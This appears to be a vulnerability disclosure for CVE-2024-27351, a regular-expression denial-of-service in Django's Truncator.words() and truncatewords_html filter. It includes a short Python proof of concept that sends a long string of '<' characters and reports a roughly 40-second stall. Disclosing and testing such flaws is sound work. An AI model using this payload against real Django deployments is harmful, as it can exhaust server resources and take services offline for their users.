CVE-2024-27351: Potential regular expression denial-of-service in django.utils.text.Truncator.words()

# TL;DR **CVE-2024-27351**: Potential regular expression denial-of-service in `django.utils.text.Truncator.words()` # Details: `django.utils.text.Truncator.words()` method (with `html=True`) and `truncatewords_html` template filter were subject to a potential regular expression denial-of-service attack using a suitably crafted string (follow up to CVE-2019-14232 and CVE-2023-43665). - The `Truncator` class truncates text based on word count. - When the `html` flag is set, the internal `_truncate_html()` method is used. - This method relies on regular expressions stored in variables (`re_chars` and `re_words`) to perform the truncation. - These regular expressions are vulnerable to ReDoS attacks, which can cause significant performance degradation and denial-of-service. **PoC:** ```python #!/usr/bin/env python3 from django.utils.text import Truncator import time MAX_LENGTH = 65535 payload = '<' * MAX_LENGTH print('[INFO] %d bytes of payload' % len(payload)) start_time = time.time() Truncator(payload).words(3, truncate='...', html=True) # BOOM! end_time = time.time() print('[INFO] Truncator().words() took %lf seconds' % (end_time - start_time)) ``` The impact of this vulnerability may vary depending on the computing environment. In my tests using an AMD Ryzen 7 3700X with 32GB RAM, I observed a notable delay of approximately 40 seconds. ## Impact An attacker could exploit this vulnerability to: - Consume excessive server resources, causing performance degradation and potential service outages. - Delay application response times significantly.